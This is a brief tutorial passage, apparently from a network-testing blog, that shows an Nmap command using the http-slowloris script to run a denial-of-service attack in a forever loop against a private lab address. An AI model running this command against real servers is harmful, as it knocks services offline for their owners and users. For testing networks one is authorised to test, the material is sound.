Nmap features never seem to end, and thanks to the NSE, that even allows us to launch DOS attacks against our network testings.

for example we can try to exploit the slowloris vulnerability by launching a DOS attack in a forever loop:

nmap 192.168.1.105 -max-parallelism 800 -Pn --script http-slowloris --script-args http-slowloris.runforever=true